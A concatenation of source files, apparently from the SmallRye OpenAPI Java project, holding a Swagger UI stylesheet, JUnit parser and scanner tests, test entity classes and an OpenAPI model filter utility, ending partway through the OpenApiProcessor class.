<|start_filename|>ui/open-api-ui/src/main/webapp/style.css<|end_filename|>
html{
box-sizing: border-box;
overflow: -moz-scrollbars-vertical;
overflow-y: scroll;
}
*,
*:before,
*:after
{
box-sizing: inherit;
}
body{
margin:0;
background: #fafafa;
}
.swagger-ui .topbar {
background-color: #343a40;
}
#footer {
font-family:sans-serif;
color:#3b4151;
font-size:70%;
text-align: center;
}
<|start_filename|>core/src/test/java/io/smallrye/openapi/runtime/io/OpenApiParserAndSerializerTest.java<|end_filename|>
package io.smallrye.openapi.runtime.io;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.StringReader;
import java.net.URL;
import java.text.ParseException;
import org.apache.commons.io.IOUtils;
import org.eclipse.microprofile.openapi.models.OpenAPI;
import org.json.JSONException;
import org.junit.jupiter.api.Assertions;
import org.junit.jupiter.api.Test;
import org.skyscreamer.jsonassert.JSONAssert;
/**
* @author <EMAIL>
*/
class OpenApiParserAndSerializerTest {
/**
* Loads a resource as a string (reads the content at the URL).
*
* @param testResource
* @throws IOException
*/
private static String loadResource(URL testResource) throws IOException {
return IOUtils.toString(testResource, "UTF-8");
}
/**
* Compares two JSON strings.
*
* @param expected
* @param actual
* @throws JSONException
*/
private static void assertJsonEquals(String expected, String actual) throws JSONException {
JSONAssert.assertEquals(expected, actual, true);
}
/**
* @param original
* @param roundTrip
*/
private static void assertYamlEquals(String original, String roundTrip) {
Assertions.assertEquals(normalizeYaml(original), normalizeYaml(roundTrip));
}
/**
     * Normalizes the YAML by removing lines that start with "--" (such as the document start marker).
*
* @param yaml
*/
private static String normalizeYaml(String yaml) {
try {
StringBuilder builder = new StringBuilder();
BufferedReader reader = new BufferedReader(new StringReader(yaml));
for (String line = reader.readLine(); line != null; line = reader.readLine()) {
if (line.startsWith("--")) {
continue;
}
builder.append(line);
builder.append("\n");
}
return builder.toString();
} catch (IOException e) {
throw new RuntimeException(e);
}
}
/**
* Performs a full round-trip parse+serialize test on a single resource.
*
* @param resource
* @param format
* @throws IOException
* @throws ParseException
* @throws JSONException
*/
private static void doTest(String resource, Format format) throws IOException, ParseException, JSONException {
URL testResource = OpenApiParserAndSerializerTest.class.getResource(resource);
String original = loadResource(testResource);
OpenAPI impl = OpenApiParser.parse(testResource);
String roundTrip = OpenApiSerializer.serialize(impl, format);
try {
if (format == Format.JSON) {
assertJsonEquals(original, roundTrip);
} else {
assertYamlEquals(original, roundTrip);
}
} catch (AssertionError e) {
System.out.println("================");
System.out.println(roundTrip);
System.out.println("================");
throw e;
}
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testParseSimplest() throws IOException, ParseException, JSONException {
doTest("simplest.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testParseSimplestYaml() throws IOException, ParseException, JSONException {
doTest("simplest.yaml", Format.YAML);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testParseInfo() throws IOException, ParseException, JSONException {
doTest("info.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testParseInfoYaml() throws IOException, ParseException, JSONException {
doTest("info.yaml", Format.YAML);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testExternalDocs() throws IOException, ParseException, JSONException {
doTest("externalDocs.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testExtensions() throws IOException, ParseException, JSONException {
doTest("extensions.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testSecurity() throws IOException, ParseException, JSONException {
doTest("security.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testServers() throws IOException, ParseException, JSONException {
doTest("servers.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testServersYaml() throws IOException, ParseException, JSONException {
doTest("servers.yaml", Format.YAML);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testTags() throws IOException, ParseException, JSONException {
doTest("tags.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testComponents_Callbacks() throws IOException, ParseException, JSONException {
doTest("components-callbacks.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testComponents_Empty() throws IOException, ParseException, JSONException {
doTest("components-empty.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testComponents_Examples() throws IOException, ParseException, JSONException {
doTest("components-examples.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testComponents_Headers() throws IOException, ParseException, JSONException {
doTest("components-headers.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testComponents_Links() throws IOException, ParseException, JSONException {
doTest("components-links.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testComponents_Parameters() throws IOException, ParseException, JSONException {
doTest("components-parameters.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testComponents_RequestBodies() throws IOException, ParseException, JSONException {
doTest("components-requestBodies.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testComponents_Responses() throws IOException, ParseException, JSONException {
doTest("components-responses.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testComponents_Schemas() throws IOException, ParseException, JSONException {
doTest("components-schemas.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testComponents_SecuritySchemes() throws IOException, ParseException, JSONException {
doTest("components-securitySchemes.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_AllOperations() throws IOException, ParseException, JSONException {
doTest("paths-all-operations.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_Empty() throws IOException, ParseException, JSONException {
doTest("paths-empty.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_GetCallbacks() throws IOException, ParseException, JSONException {
doTest("paths-get-callbacks.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_GetParameters() throws IOException, ParseException, JSONException {
doTest("paths-get-parameters.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_GetRequestBodyContent() throws IOException, ParseException, JSONException {
doTest("paths-get-requestBody-content.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_GetRequestBodyExample() throws IOException, ParseException, JSONException {
doTest("paths-get-requestBody-example.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_GetRequestBody() throws IOException, ParseException, JSONException {
doTest("paths-get-requestBody.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_GetResponseContent() throws IOException, ParseException, JSONException {
doTest("paths-get-response-content.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_GetResponseHeaders() throws IOException, ParseException, JSONException {
doTest("paths-get-response-headers.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_GetResponseLinks() throws IOException, ParseException, JSONException {
doTest("paths-get-response-links.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_GetResponses() throws IOException, ParseException, JSONException {
doTest("paths-get-responses.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_GetSecurity() throws IOException, ParseException, JSONException {
doTest("paths-get-security.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_GetServers() throws IOException, ParseException, JSONException {
doTest("paths-get-servers.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_Get() throws IOException, ParseException, JSONException {
doTest("paths-get.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_Parameters() throws IOException, ParseException, JSONException {
doTest("paths-parameters.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_Ref() throws IOException, ParseException, JSONException {
doTest("paths-ref.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_Servers() throws IOException, ParseException, JSONException {
doTest("paths-servers.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testPaths_Extensions() throws IOException, ParseException, JSONException {
doTest("paths-with-extensions.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testSchemas_Discriminator() throws IOException, ParseException, JSONException {
doTest("schemas-discriminator.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testSchemas_AdditionalProperties() throws IOException, ParseException, JSONException {
doTest("schemas-with-additionalProperties.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testSchemas_AllOf() throws IOException, ParseException, JSONException {
doTest("schemas-with-allOf.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testSchemas_Composition() throws IOException, ParseException, JSONException {
doTest("schemas-with-composition.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testSchemas_Example() throws IOException, ParseException, JSONException {
doTest("schemas-with-example.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testSchemas_ExternalDocs() throws IOException, ParseException, JSONException {
doTest("schemas-with-externalDocs.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testSchemas_MetaData() throws IOException, ParseException, JSONException {
doTest("schemas-with-metaData.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testSchemas_XML() throws IOException, ParseException, JSONException {
doTest("schemas-with-xml.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testEverything() throws IOException, ParseException, JSONException {
doTest("_everything.json", Format.JSON);
}
/**
* Test method for {@link OpenApiParser#parse(java.net.URL)}.
*/
@Test
void testEverythingYaml() throws IOException, ParseException, JSONException {
doTest("_everything.yaml", Format.YAML);
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/entities/JaxbGreeting.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.entities;
import javax.xml.bind.annotation.XmlRootElement;
@XmlRootElement
public class JaxbGreeting {
private final String message;
public JaxbGreeting(String message) {
this.message = message;
}
public String getMessage() {
return message;
}
}
<|start_filename|>extension-jaxrs/src/test/java/io/smallrye/openapi/runtime/scanner/ExpectationTests.java<|end_filename|>
package io.smallrye.openapi.runtime.scanner;
import static org.jboss.jandex.DotName.createSimple;
import java.io.IOException;
import org.eclipse.microprofile.openapi.models.media.Schema;
import org.jboss.jandex.ClassType;
import org.jboss.jandex.DotName;
import org.jboss.jandex.Type;
import org.json.JSONException;
import org.junit.jupiter.api.Test;
import org.junit.jupiter.params.ParameterizedTest;
import org.junit.jupiter.params.provider.CsvSource;
import test.io.smallrye.openapi.runtime.scanner.entities.Bar;
import test.io.smallrye.openapi.runtime.scanner.entities.BuzzLinkedList;
import test.io.smallrye.openapi.runtime.scanner.entities.EnumContainer;
import test.io.smallrye.openapi.runtime.scanner.entities.EnumRequiredContainer;
import test.io.smallrye.openapi.runtime.scanner.entities.GenericTypeTestContainer;
/**
* @author <NAME> {@literal <<EMAIL>>}
*/
class ExpectationTests extends JaxRsDataObjectScannerTestBase {
/**
* Unresolvable type parameter.
*/
@Test
void testUnresolvable() throws IOException, JSONException {
DotName bar = createSimple(Bar.class.getName());
OpenApiDataObjectScanner scanner = new OpenApiDataObjectScanner(context, ClassType.create(bar, Type.Kind.CLASS));
Schema result = scanner.process();
printToConsole(bar.local(), result);
assertJsonEquals(bar.local(), "unresolvable.expected.json", result);
}
/**
* Unresolvable type parameter.
*/
@Test
void testCycle() throws IOException, JSONException {
DotName buzz = createSimple(BuzzLinkedList.class.getName());
OpenApiDataObjectScanner scanner = new OpenApiDataObjectScanner(context, ClassType.create(buzz, Type.Kind.CLASS));
Schema result = scanner.process();
printToConsole(buzz.local(), result);
assertJsonEquals(buzz.local(), "cycle.expected.json", result);
}
@Test
void testBareEnum() throws IOException, JSONException {
DotName baz = createSimple(EnumContainer.class.getName());
OpenApiDataObjectScanner scanner = new OpenApiDataObjectScanner(context, ClassType.create(baz, Type.Kind.CLASS));
Schema result = scanner.process();
printToConsole(baz.local(), result);
assertJsonEquals(baz.local(), "enum.expected.json", result);
}
@Test
void testRequiredEnum() throws IOException, JSONException {
DotName baz = createSimple(EnumRequiredContainer.class.getName());
OpenApiDataObjectScanner scanner = new OpenApiDataObjectScanner(context, ClassType.create(baz, Type.Kind.CLASS));
Schema result = scanner.process();
printToConsole(baz.local(), result);
assertJsonEquals(baz.local(), "enumRequired.expected.json", result);
}
@ParameterizedTest
@CsvSource({
"nesting, generic.nested.expected.json",
"complexNesting, generic.complexNesting.expected.json",
"complexInheritance, generic.complexInheritance.expected.json",
"genericWithBounds, generic.withBounds.expected.json",
"genericContainer, generic.fields.expected.json",
"overriddenNames, generic.fields.overriddenNames.expected.json"
})
void testGenericTypeFields(String fieldName, String expectedResource) throws IOException, JSONException {
String name = GenericTypeTestContainer.class.getName();
Type pType = getFieldFromKlazz(name, fieldName).type();
OpenApiDataObjectScanner scanner = new OpenApiDataObjectScanner(context, pType);
Schema result = scanner.process();
printToConsole(name, result);
assertJsonEquals(name, expectedResource, result);
}
}
<|start_filename|>extension-jaxrs/src/test/java/io/smallrye/openapi/runtime/scanner/RequestBodyScanTests.java<|end_filename|>
package io.smallrye.openapi.runtime.scanner;
import java.io.IOException;
import java.util.HashMap;
import org.eclipse.microprofile.openapi.models.OpenAPI;
import org.jboss.jandex.Index;
import org.json.JSONException;
import org.junit.jupiter.api.Test;
class RequestBodyScanTests extends IndexScannerTestBase {
private static void test(String expectedResource, Class<?>... classes) throws IOException, JSONException {
Index index = indexOf(classes);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(dynamicConfig(new HashMap<String, Object>()), index);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals(expectedResource, result);
}
@Test
void testJavaxResteasyMultipartInput() throws IOException, JSONException {
test("params.resteasy-multipart-mixed.json",
test.io.smallrye.openapi.runtime.scanner.ResteasyMultipartInputTestResource.class);
}
@Test
void testJakartaResteasyMultipartInput() throws IOException, JSONException {
test("params.resteasy-multipart-mixed.json",
test.io.smallrye.openapi.runtime.scanner.jakarta.ResteasyMultipartInputTestResource.class);
}
@Test
void testJavaxResteasyMultipartInputList() throws IOException, JSONException {
test("params.resteasy-multipart-mixed-array.json",
test.io.smallrye.openapi.runtime.scanner.ResteasyMultipartMixedListTestResource.class,
test.io.smallrye.openapi.runtime.scanner.RequestBodyWidget.class);
}
@Test
void testJakartaResteasyMultipartInputList() throws IOException, JSONException {
test("params.resteasy-multipart-mixed-array.json",
test.io.smallrye.openapi.runtime.scanner.jakarta.ResteasyMultipartMixedListTestResource.class,
test.io.smallrye.openapi.runtime.scanner.RequestBodyWidget.class);
}
@Test
void testJavaxResteasyMultipartFormDataInput() throws IOException, JSONException {
test("params.resteasy-multipart-form-data-input.json",
test.io.smallrye.openapi.runtime.scanner.ResteasyMultipartFormDataInputTestResource.class);
}
@Test
void testJakartaResteasyMultipartFormDataInput() throws IOException, JSONException {
test("params.resteasy-multipart-form-data-input.json",
test.io.smallrye.openapi.runtime.scanner.jakarta.ResteasyMultipartFormDataInputTestResource.class);
}
@Test
void testJavaxResteasyMultipartFormDataMap() throws IOException, JSONException {
test("params.resteasy-multipart-form-data-map.json",
test.io.smallrye.openapi.runtime.scanner.ResteasyMultipartFormDataMapTestResource.class,
test.io.smallrye.openapi.runtime.scanner.RequestBodyWidget.class);
}
@Test
void testJakartaResteasyMultipartFormDataMap() throws IOException, JSONException {
test("params.resteasy-multipart-form-data-map.json",
test.io.smallrye.openapi.runtime.scanner.jakarta.ResteasyMultipartFormDataMapTestResource.class,
test.io.smallrye.openapi.runtime.scanner.RequestBodyWidget.class);
}
@Test
void testJavaxResteasyMultipartRelatedInput() throws IOException, JSONException {
test("params.resteasy-multipart-related-input.json",
test.io.smallrye.openapi.runtime.scanner.ResteasyMultipartRelatedInputTestResource.class);
}
@Test
void testJakartaResteasyMultipartRelatedInput() throws IOException, JSONException {
test("params.resteasy-multipart-related-input.json",
test.io.smallrye.openapi.runtime.scanner.jakarta.ResteasyMultipartRelatedInputTestResource.class);
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/AbstractPet.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
/* Test models and resources below. */
public abstract class AbstractPet {
@Schema(name = "pet_type", required = true)
private String type;
public String getType() {
return type;
}
public void setType(String type) {
this.type = type;
}
}
<|start_filename|>core/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/NonJavaBeanAccessorProperty.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
public class NonJavaBeanAccessorProperty {
String name;
@Schema(title = "Name of the property")
String name() {
return name;
}
// Should be skipped
String anotherValue() {
return null;
}
// Should be skipped
String get() {
return name;
}
// Should be skipped
String isNotAnAccessor() {
return null;
}
void name(String name) {
this.name = name;
}
}
<|start_filename|>core/src/main/java/io/smallrye/openapi/api/util/FilterUtil.java<|end_filename|>
package io.smallrye.openapi.api.util;
import java.util.ArrayList;
import java.util.Collection;
import java.util.LinkedHashSet;
import java.util.List;
import java.util.Map;
import java.util.function.BiConsumer;
import java.util.function.Consumer;
import java.util.function.UnaryOperator;
import org.eclipse.microprofile.openapi.OASFilter;
import org.eclipse.microprofile.openapi.models.Components;
import org.eclipse.microprofile.openapi.models.OpenAPI;
import org.eclipse.microprofile.openapi.models.Operation;
import org.eclipse.microprofile.openapi.models.PathItem;
import org.eclipse.microprofile.openapi.models.callbacks.Callback;
import org.eclipse.microprofile.openapi.models.headers.Header;
import org.eclipse.microprofile.openapi.models.links.Link;
import org.eclipse.microprofile.openapi.models.media.Content;
import org.eclipse.microprofile.openapi.models.media.Encoding;
import org.eclipse.microprofile.openapi.models.media.MediaType;
import org.eclipse.microprofile.openapi.models.media.Schema;
import org.eclipse.microprofile.openapi.models.parameters.Parameter;
import org.eclipse.microprofile.openapi.models.parameters.RequestBody;
import org.eclipse.microprofile.openapi.models.responses.APIResponse;
import org.eclipse.microprofile.openapi.models.responses.APIResponses;
/**
* @author <EMAIL>
*
*/
public class FilterUtil {
private FilterUtil() {
}
/**
* Apply the given filter to the given model.
*
* @param filter
* OASFilter
* @param model
* OpenAPI model
* @return Filtered OpenAPI model
*/
public static final OpenAPI applyFilter(OASFilter filter, OpenAPI model) {
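        // Filter nested elements first (components, paths, servers, tags), then give the filter a pass over the whole model.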
filterComponents(filter, model.getComponents());
if (model.getPaths() != null) {
filter(filter,
model.getPaths().getPathItems(),
FilterUtil::filterPathItem,
filter::filterPathItem,
model.getPaths()::removePathItem);
}
filter(filter, model.getServers(), null, filter::filterServer, model::removeServer);
filter(filter, model.getTags(), null, filter::filterTag, model::removeTag);
filter.filterOpenAPI(model);
return model;
}
/**
* Filters the given model.
*
* @param filter
* @param model
*/
private static void filterComponents(OASFilter filter, Components model) {
if (model != null) {
filter(filter, model.getCallbacks(), FilterUtil::filterCallback, filter::filterCallback, model::removeCallback);
filter(filter, model.getHeaders(), FilterUtil::filterHeader, filter::filterHeader, model::removeHeader);
filter(filter, model.getLinks(), FilterUtil::filterLink, filter::filterLink, model::removeLink);
filter(filter, model.getParameters(), FilterUtil::filterParameter, filter::filterParameter, model::removeParameter);
filter(filter, model.getRequestBodies(), FilterUtil::filterRequestBody, filter::filterRequestBody,
model::removeRequestBody);
filter(filter, model.getResponses(), FilterUtil::filterAPIResponse, filter::filterAPIResponse,
model::removeResponse);
filter(filter, model.getSchemas(), FilterUtil::filterSchema, filter::filterSchema, model::removeSchema);
filter(filter, model.getSecuritySchemes(), null, filter::filterSecurityScheme, model::removeSecurityScheme);
}
}
/**
* Filters the given models.
*
* @param filter OASFilter
* @param models map of models to be filtered
* @param contentFilter a filter method to be applied over the properties of each model
* @param modelFilter a filter method - reference to method of OASFilter
* @param remover
* reference to the containing model's method for removing models
*/
private static <K, V> void filter(OASFilter filter,
Map<K, V> models,
BiConsumer<OASFilter, V> contentFilter,
UnaryOperator<V> modelFilter,
Consumer<K> remover) {
if (models != null) {
// The collection must be copied since the original may be modified via the remover
for (Map.Entry<K, V> entry : new LinkedHashSet<>(models.entrySet())) {
V model = entry.getValue();
if (contentFilter != null) {
contentFilter.accept(filter, model);
}
if (modelFilter.apply(model) == null) {
remover.accept(entry.getKey());
}
}
}
}
/**
* Filters the given models.
*
* @param filter OASFilter
* @param models list of models to be filtered
* @param contentFilter a filter method to be applied over the properties of each model
* @param modelFilter a filter method - reference to method of OASFilter
* @param remover
* reference to the containing model's method for removing models
*/
private static <T> void filter(OASFilter filter,
List<T> models,
BiConsumer<OASFilter, T> contentFilter,
UnaryOperator<T> modelFilter,
Consumer<T> remover) {
if (models != null) {
// The collection must be copied since the original may be modified via the remover
for (T model : new ArrayList<>(models)) {
if (contentFilter != null) {
contentFilter.accept(filter, model);
}
if (modelFilter.apply(model) == null) {
remover.accept(model);
}
}
}
}
/**
* Filters a given model
*
* @param filter OASFilter
     * @param model the model to be filtered
     * @param contentFilter a filter method to be applied over the properties of the model
* @param modelFilter a filter method - reference to method of OASFilter
* @param mutator
* reference to the containing model's method for updating the model
*/
private static <T> void filter(OASFilter filter,
T model,
BiConsumer<OASFilter, T> contentFilter,
UnaryOperator<T> modelFilter,
Consumer<T> mutator) {
if (model != null) {
if (contentFilter != null) {
contentFilter.accept(filter, model);
}
mutator.accept(modelFilter.apply(model));
}
}
/**
* Filters the given model.
*
* @param filter
* @param model
*/
private static void filterCallback(OASFilter filter, Callback model) {
if (model != null) {
Collection<String> keys = new ArrayList<>(model.getPathItems().keySet());
for (String key : keys) {
PathItem childModel = model.getPathItem(key);
filterPathItem(filter, childModel);
if (filter.filterPathItem(childModel) == null) {
model.removePathItem(key);
}
}
}
}
/**
* Filters the given model.
*
* @param filter
* @param model
*/
private static void filterPathItem(OASFilter filter, PathItem model) {
if (model != null) {
filter(filter, model.getParameters(), FilterUtil::filterParameter, filter::filterParameter, model::removeParameter);
filterOperation(filter, model.getDELETE(), model::setDELETE);
filterOperation(filter, model.getGET(), model::setGET);
filterOperation(filter, model.getHEAD(), model::setHEAD);
filterOperation(filter, model.getOPTIONS(), model::setOPTIONS);
filterOperation(filter, model.getPATCH(), model::setPATCH);
filterOperation(filter, model.getPOST(), model::setPOST);
filterOperation(filter, model.getPUT(), model::setPUT);
filterOperation(filter, model.getTRACE(), model::setTRACE);
filter(filter, model.getServers(), null, filter::filterServer, model::removeServer);
}
}
/**
* Filters the given model.
*
* @param filter
* @param model
*/
private static void filterOperation(OASFilter filter, Operation model, Consumer<Operation> mutator) {
if (model != null) {
filter(filter, model.getCallbacks(), FilterUtil::filterCallback, filter::filterCallback, model::removeCallback);
filter(filter, model.getParameters(), FilterUtil::filterParameter, filter::filterParameter, model::removeParameter);
filter(filter, model.getRequestBody(), FilterUtil::filterRequestBody, filter::filterRequestBody,
model::setRequestBody);
if (model.getResponses() != null) {
APIResponses responses = model.getResponses();
filter(filter, responses.getAPIResponses(), FilterUtil::filterAPIResponse, filter::filterAPIResponse,
responses::removeAPIResponse);
}
filter(filter, model.getServers(), null, filter::filterServer, model::removeServer);
mutator.accept(filter.filterOperation(model));
}
}
/**
* Filters the given model.
*
* @param filter
* @param model
*/
private static void filterHeader(OASFilter filter, Header model) {
if (model != null) {
filterContent(filter, model.getContent());
filter(filter, model.getSchema(), FilterUtil::filterSchema, filter::filterSchema, model::setSchema);
}
}
/**
* Filters the given model.
*
* @param filter
* @param model
*/
private static void filterContent(OASFilter filter, Content model) {
if (model != null && model.getMediaTypes() != null) {
Collection<String> keys = new ArrayList<>(model.getMediaTypes().keySet());
for (String key : keys) {
MediaType childModel = model.getMediaType(key);
filterMediaType(filter, childModel);
}
}
}
/**
* Filters the given model.
*
* @param filter
* @param model
*/
private static void filterMediaType(OASFilter filter, MediaType model) {
if (model != null) {
filterEncoding(filter, model.getEncoding());
filter(filter, model.getSchema(), FilterUtil::filterSchema, filter::filterSchema, model::setSchema);
}
}
/**
* Filters the given models.
*
* @param filter
* @param models
*/
private static void filterEncoding(OASFilter filter, Map<String, Encoding> models) {
if (models != null) {
Collection<String> keys = new ArrayList<>(models.keySet());
for (String key : keys) {
Encoding model = models.get(key);
filterEncoding(filter, model);
}
}
}
/**
* Filters the given model.
*
* @param filter
* @param model
*/
private static void filterEncoding(OASFilter filter, Encoding model) {
if (model != null) {
filter(filter, model.getHeaders(), FilterUtil::filterHeader, filter::filterHeader, model::removeHeader);
}
}
/**
* Filters the given model.
*
* @param filter
* @param model
*/
private static void filterLink(OASFilter filter, Link model) {
if (model != null && model.getServer() != null) {
model.setServer(filter.filterServer(model.getServer()));
}
}
/**
* Filters the given model.
*
* @param filter
* @param model
*/
private static void filterParameter(OASFilter filter, Parameter model) {
if (model != null) {
filterContent(filter, model.getContent());
filter(filter, model.getSchema(), FilterUtil::filterSchema, filter::filterSchema, model::setSchema);
}
}
/**
* Filters the given model.
*
* @param filter
* @param model
*/
private static void filterRequestBody(OASFilter filter, RequestBody model) {
if (model != null) {
filterContent(filter, model.getContent());
}
}
/**
* Filters the given model.
*
* @param filter
* @param model
*/
private static void filterAPIResponse(OASFilter filter, APIResponse model) {
if (model != null) {
filterContent(filter, model.getContent());
filter(filter, model.getHeaders(), FilterUtil::filterHeader, filter::filterHeader, model::removeHeader);
filter(filter, model.getLinks(), FilterUtil::filterLink, filter::filterLink, model::removeLink);
}
}
/**
* Filters the given model.
*
* @param filter
* @param model
*/
private static void filterSchema(OASFilter filter, Schema model) {
if (model != null) {
filter(filter, model.getAdditionalPropertiesSchema(), FilterUtil::filterSchema, filter::filterSchema,
model::setAdditionalPropertiesSchema);
filter(filter, model.getAllOf(), FilterUtil::filterSchema, filter::filterSchema, model::removeAllOf);
filter(filter, model.getAnyOf(), FilterUtil::filterSchema, filter::filterSchema, model::removeAnyOf);
filter(filter, model.getItems(), FilterUtil::filterSchema, filter::filterSchema, model::setItems);
filter(filter, model.getNot(), FilterUtil::filterSchema, filter::filterSchema, model::setNot);
filter(filter, model.getProperties(), FilterUtil::filterSchema, filter::filterSchema, model::removeProperty);
}
}
}
<|start_filename|>core/src/main/java/io/smallrye/openapi/runtime/OpenApiProcessor.java<|end_filename|>
package io.smallrye.openapi.runtime;
import java.io.IOException;
import java.io.InputStream;
import java.lang.reflect.InvocationTargetException;
import java.util.ArrayList;
import java.util.List;
import org.eclipse.microprofile.config.Config;
import org.eclipse.microprofile.config.ConfigProvider;
import org.eclipse.microprofile.openapi.OASFilter;
import org.eclipse.microprofile.openapi.OASModelReader;
import org.eclipse.microprofile.openapi.models.OpenAPI;
import org.jboss.jandex.IndexView;
import io.smallrye.openapi.api.OpenApiConfig;
import io.smallrye.openapi.api.OpenApiConfigImpl;
import io.smallrye.openapi.api.OpenApiDocument;
import io.smallrye.openapi.api.util.ClassLoaderUtil;
import io.smallrye.openapi.runtime.io.Format;
import io.smallrye.openapi.runtime.io.OpenApiParser;
import io.smallrye.openapi.runtime.scanner.OpenApiAnnotationScanner;
/**
* Provides some core archive processing functionality.
*
* @author <EMAIL>
*/
public class OpenApiProcessor {
private OpenApiProcessor() {
}
public static OpenAPI bootstrap(IndexView index) {
Config config = ConfigProvider.getConfig();
OpenApiConfig openApiConfig = OpenApiConfigImpl.fromConfig(config);
return bootstrap(openApiConfig, index);
}
public static OpenAPI bootstrap(OpenApiConfig config, IndexView index) {
ClassLoader defaultClassLoader = ClassLoaderUtil.getDefaultClassLoader();
return bootstrap(config, index, defaultClassLoader);
}
public static OpenAPI bootstrap(OpenApiConfig config, IndexView index, OpenApiStaticFile... staticFiles) {
ClassLoader defaultClassLoader = ClassLoaderUtil.getDefaultClassLoader();
return bootstrap(config, index, defaultClassLoader, staticFiles);
}
public static OpenAPI bootstrap(OpenApiConfig config, IndexView index, ClassLoader classLoader) {
List<OpenApiStaticFile> staticFiles = loadOpenApiStaticFiles(classLoader);
return bootstrap(config, index, classLoader, staticFiles.toArray(new OpenApiStaticFile[] {}));
}
public static OpenAPI bootstrap(OpenApiConfig config, IndexView index, ClassLoader classLoader,
OpenApiStaticFile... staticFiles) {
OpenApiDocument.INSTANCE.reset();
// Set the config
if (config != null) {
OpenApiDocument.INSTANCE.config(config);
}
// Load all static files
